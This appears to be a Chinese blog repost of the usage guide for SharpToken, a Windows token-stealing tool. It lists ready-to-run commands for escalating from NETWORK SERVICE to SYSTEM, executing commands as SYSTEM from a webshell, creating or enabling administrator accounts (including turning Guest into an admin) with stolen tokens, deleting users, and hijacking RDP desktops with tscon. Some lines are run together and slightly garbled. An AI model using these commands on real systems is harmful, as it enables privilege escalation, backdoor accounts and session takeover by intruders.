关注我们 | 发现更多精彩内容
SharpToken By BeichenDream=========================================================Github : https://github.com/BeichenDream/SharpTokenIf you are an NT AUTHORITY\NETWORK SERVICE user then you just need to add the bypass parameter to become an NT AUTHORIT\YSYSTEMe.g.SharpToken execute "NT AUTHORITY\SYSTEM" "cmd /c whoami" bypassUsage:SharpToken COMMAND argumentsCOMMANDS:list_token [process pid] [bypass]list_all_token [process pid] [bypass]add_user <username> <password> [group] [domain] [bypass]enableUser <username> <NewPassword> [NewGroup] [bypass]delete_user <username> [domain] [bypass]execute <tokenUser> <commandLine> [Interactive] [bypass]enableRDP [bypass]tscon <targetSessionId> [sourceSessionId] [bypass]example:SharpToken list_tokenSharpToken list_token bypassSharpToken list_token 6543SharpToken add_user admin Abcd1234! AdministratorsSharpToken enableUser Guest Abcd1234! AdministratorsSharpToken delete_user adminSharpToken execute "NT AUTHORITY\SYSTEM" "cmd /c whoami"SharpToken execute "NT AUTHORITY\SYSTEM" "cmd /c whoami" bypassSharpToken execute "NT AUTHORITY\SYSTEM" cmd trueSharpToken execute "NT AUTHORITY\SYSTEM" cmd true bypassSharpToken tscon 1
ListToken
枚举信息包括SID、LogonDomain、UserName、Session、LogonType、TokenType、TokenHandle(Duplicate后Token的句柄)、TargetProcessId(Token产生的进程)、TargetProcessToken(源进程中Token的句柄)、Groups(Token用户所在的组)位于)
SharpToken list_token枚举来自指定进程的令牌
SharpToken list_token 468获取交互式外壳
execute "NT AUTHORITY\SYSTEM" cmd true获取命令执行结果(在webshell下执行)
SharpToken execute "NT AUTHORITY\SYSTEM" "cmd /c whoami"使用窃取的令牌创建管理员用户
SharpToken add_user admin Abcd1234! Administrators使用被盗令牌启用管理员用户
SharpToken enableUser Guest Abcd1234! Administrators使用被盗令牌删除用户
SharpToken delete_user admin使用窃取的Token切换到目标桌面
其中1是目标用户的桌面,2是我们要接收的桌面
SharpToken tscon 1 2项目地址:
https://github.com/BeichenDream/SharpToken
感谢您抽出
.
.
来阅读本文
点它,分享点赞在看都在这里